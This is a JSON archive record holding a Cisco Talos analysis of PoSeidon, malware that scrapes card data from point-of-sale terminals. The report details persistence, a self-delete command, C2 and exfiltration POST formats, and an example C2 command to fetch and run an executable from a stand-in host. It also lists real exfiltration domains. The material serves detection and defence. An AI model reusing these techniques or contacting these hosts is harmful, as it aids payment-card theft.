{
	"id": "cc76c8d5-7552-4803-ba8d-83c4381c1b90",
	"created_at": "2026-04-06T00:12:20.326108Z",
	"updated_at": "2026-04-10T03:20:33.93537Z",
	"deleted_at": null,
	"sha1_hash": "a7459517ddb9cbfe198a990598647718539a25b9",
	"title": "Threat Spotlight: PoSeidon, A Deep Dive Into Point of Sale Malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2078351,
	"plain_text": "Threat Spotlight: PoSeidon, A Deep Dive Into Point of Sale\r\nMalware\r\nBy Talos Group,\r\nPublished: 2015-03-20 · Archived: 2026-04-05 20:19:52 UTC\r\nThis post was authored by Andrea Allievi, Ben Baker, Nick Biasini, JJ Cummings, Douglas Goddard, William\r\nLargent, Angel Villegas, and Alain Zidouemba\r\nCisco’s Security Solutions (CSS) consists of information security experts with a unique blend of law enforcement,\r\nenterprise security and technology security backgrounds. The team works directly with Cisco’s Talos Security\r\nIntelligence \u0026 Research Group to identify known and unknown threats, quantify and prioritize risk, and minimize\r\nfuture risk.\r\nWhen consumers make purchases from a retailer, the transaction is processed through Point-of-Sale (PoS)\r\nsystems. When a credit or debit card is used, a PoS system is used to read the information stored on the magnetic\r\nstripe on the back of the credit card. Once this information gets stolen from a merchant, it can be encoded into a\r\nmagnetic stripe and used with a new card. Criminal markets exist for this valuable information because the\r\nattackers are able to easily monetize stolen credit card data. Incidents involving PoS malware have been on the\r\nrise, affecting many large organizations as well as small mom-and-pop establishments and garnering a lot of\r\nmedia attention. The presence of large amounts of financial and personal information ensures that these companies\r\nand their retail PoS systems will remain attractive targets.\r\nhttps://blogs.cisco.com/security/talos/poseidon\r\nPage 1 of 12\n\nOverview\r\nThere is a new malware family targeting PoS systems, infecting machines to scrape memory for credit card\r\ninformation and exfiltrate that data to servers, also primarily .ru TLD, for harvesting and likely resale. 
This new\r\nmalware family, which we’ve nicknamed PoSeidon, has a few components to it, as illustrated by the diagram below:\r\nAt a high level, it starts with a Loader binary that upon being executed will first try to maintain persistence on the\r\ntarget machine in order to survive a possible system reboot. The Loader then contacts a command and control\r\nserver, retrieving a URL which contains another binary to download and execute. The downloaded binary,\r\nFindStr, installs a keylogger and scans the memory of the PoS device for number sequences that could be credit\r\ncard numbers. Upon verifying that the numbers are in fact credit card numbers, keystrokes and credit card\r\nnumbers are encoded and sent to an exfiltration server.\r\nTechnical details\r\nKeylogger\r\nThe file with SHA256 334079dc9fa5b06fbd68e81de903fcd4e356b4f2d0e8bbd6bdca7891786c39d4 could perhaps\r\nbe at the source of the PoS system compromise. We call this file KeyLogger based on debugging information\r\nfound in the binary:\r\nUpon execution, this file copies itself to either %SystemRoot%\\system32\\\u003cfilename\u003e.exe or %UserProfile%\\\u003cfilename\u003e.exe and adds a registry entry under HKLM (or HKCU)\\Software\\Microsoft\\Windows\\CurrentVersion\\Run.\r\nThe file also opens HKCU\\Software\\LogMeIn Ignition and enumerates the keys for the account subkey, opens it\r\nand deletes the PasswordTicket Value and obtains the Email Value. 
It also deletes the registry tree\r\nHKCU\\Software\\LogMeIn Ignition\\\u003ckey\u003e\\Profiles\\*.\r\nThe file sends data to an exfiltration server by POSTing to one of these URIs:\r\nwondertechmy[.]com/pes/viewtopic.php\r\nwondertechmy[.]ru/pes/viewtopic.php\r\nwondwondnew[.]ru/pes/viewtopic.php\r\nThe URI format is:\r\nuid=%I64u\u0026win=%d.%d\u0026vers=%s\r\nThe Keylogger component was potentially used to steal passwords and could have been the initial infection vector.\r\nLoader\r\nThe loader for the PoSeidon PoS malware gets its name from debugging information found in the binary:\r\nUpon being run, Loader checks to see if it’s being executed with one of these two file names:\r\nWinHost.exe\r\nWinHost32.exe\r\nIf it is not, it will make sure that no Windows service is running with the name WinHost. Loader will copy itself to\r\n%SystemRoot%\\System32\\WinHost.exe, overwriting any file in that location that would happen to have the same\r\nname. Next, Loader will start a service named WinHost.\r\nThis is done so that it remains running in memory even if the current user logs off. If Loader is not able to install\r\nitself as a service, it will try to find other instances of itself running in memory and terminate them. Subsequently,\r\nit will copy itself to %UserProfile%\\WinHost32.exe and install the registry key\r\nHKCU\\Microsoft\\Windows\\CurrentVersion\\Run\\WinHost32. Finally, it will create a new process to execute\r\n%UserProfile%\\WinHost32.exe.\r\nNow that persistence has been achieved, Loader will delete itself by running the following command:\r\ncmd.exe /c del \u003cpath_to_itself\u003e \u003e\u003e NUL\r\nThe instance of Loader running in memory attempts to read configuration data at\r\n%SystemRoot%\\System32\\WinHost.exe.cfg. 
This file can hold a list of URLs to be added to a list of hardcoded\r\nURLs already contained in Loader.\r\nLoader then attempts to contact one of the hardcoded C\u0026C servers.\r\nIf one of these domains resolves to an IP address, an HTTP POST is made using the following user-agent\r\nstring:\r\nMozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR\r\n3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\r\nPOST data is sent to either:\r\n\u003cIP ADDRESS\u003e/ldl01/viewtopic.php\r\n\u003cIP ADDRESS\u003e/pes2/viewtopic.php\r\nPOST data follows the format:\r\nuid=%I64u\u0026uinfo=%s\u0026win=%d.%d\u0026bits=%d\u0026vers=%s\u0026build=%s\r\nLoader expects the following response from the C\u0026C server:\r\n{\u003cCommandLetter\u003e:\u003cArgumentString\u003e}\r\nExample responses:\r\n{R:http://badguy.com/malwarefilename.exe}\r\n{b:pes13n|373973303|https://01.220.131.116/ldl01/files/pes13n.exe}\r\nIt’s by fetching and executing the executable referenced in the server response that the second part of PoSeidon\r\nfinds its way to the PoS device.\r\nFindStr\r\nThe loader for the PoSeidon PoS malware gets its name from debugging information found in the binary:\r\nAn embedded PE is extracted through shellcode and execution continues with the embedded binary. This file\r\ninstalls a minimal keylogger that is implemented similarly to the description found here. 
The data intercepted by\r\nthis keylogger will later be sent to an exfiltration server.\r\nThe PE then cycles through all running processes on the PoS device to look for processes with a security token\r\nnot associated with the “NT AUTHORITY” domain name. It iterates through all read/write pages within those\r\nprocesses looking for credit card data.\r\nThe malware only looks for number sequences that start with:\r\n6, 5, 4 with a length of 16 digits (Discover, Visa, Mastercard)\r\n3 with a length of 15 digits (AMEX)\r\nIt then uses the Luhn algorithm to verify that the numbers are actually credit or debit card numbers as shown by\r\nthe code segment below:\r\nNext, DNS resolution is attempted for the domains below. These are some of the known data exfiltration servers:\r\nquartlet.com\r\nhorticartf.com\r\nkilaxuntf.ru\r\ndreplicag.ru\r\nfimzusoln.ru\r\nwetguqan.ru\r\nIf one of the domains above resolves to an IP address, an HTTP POST is made using the following user-agent\r\nstring:\r\nMozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR\r\n3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\r\nPOST data is sent to:\r\n\u003cIP ADDRESS\u003e/pes13/viewtopic.php\r\nData follows this format:\r\noprat=2\u0026uid=%I64u\u0026uinfo=%s\u0026win=%d.%d\u0026vers=%s\r\nOptional POST data (data: credit card numbers, logs: keylogger data):\r\n\u0026data=\u003cXORed_with_0x2A_then_base64_data_unk\u003e\r\n\u0026logs=\u003cXORed_with_0x2A_then_base64_data_unk\u003e\r\nCredit card numbers and keylogger data are sent to the exfiltration server after being XORed and base64 encoded.\r\nThe expected response from the exfiltration server is:\r\nThis mechanism allows the malware to update itself, based on commands received from the 
exfiltration\r\nserver.\r\nLoader vs FindStr\r\nComparing an unpacked copy of Loader version 11.4 to an unpacked copy of FindStr version 7.1 with Bindiff\r\nshows that 62% of the functionality in both samples is the same. The actors behind this malware probably\r\ndeveloped some core functionality and compiled it into a library to be used by other projects they are developing.\r\nIOC\r\nEndpoint IOC files:\r\nWin.Trojan.PoSeidon.RegistryItem.ioc\r\nWin.Trojan.PoSeidon.ProcessItem.ioc\r\nWin.Trojan.PoSeidon.FileItem.ioc\r\nConclusion\r\nPoSeidon is another in the growing number of Point-of-Sale malware families targeting PoS systems, demonstrating the\r\nsophisticated techniques and approaches of malware authors. Attackers will continue to target PoS systems and\r\nemploy various obfuscation techniques in an attempt to avoid detection. As long as PoS attacks continue to\r\nprovide returns, attackers will continue to invest in innovation and development of new malware families.\r\nNetwork administrators will need to remain vigilant and adhere to industry best practices to ensure coverage and\r\nprotection against advancing malware threats.\r\nSnort Rules: 33836-33852. 
Please refer to the Defense Center or FireSIGHT management console for updated\r\ninformation.\r\nProtecting Users from These Threats\r\nWe encourage organizations to consider security best practices, starting with a threat-centric approach. Given the\r\ndynamic threat landscape, we advocate this threat-centric and operationalized approach that implements\r\nprotections across the extended network – and across the full attack continuum – before, during, and after an\r\nattack. This approach is predicated upon superior visibility, continuous control, and advanced threat protection\r\nacross the extended network and the entire attack continuum.\r\nSource: https://blogs.cisco.com/security/talos/poseidon",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://blogs.cisco.com/security/talos/poseidon"
	],
	"report_names": [
		"poseidon"
	],
	"threat_actors": [],
	"ts_created_at": 1775434340,
	"ts_updated_at": 1775791233,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a7459517ddb9cbfe198a990598647718539a25b9.pdf",
		"text": "https://archive.orkl.eu/a7459517ddb9cbfe198a990598647718539a25b9.txt",
		"img": "https://archive.orkl.eu/a7459517ddb9cbfe198a990598647718539a25b9.jpg"
	}
}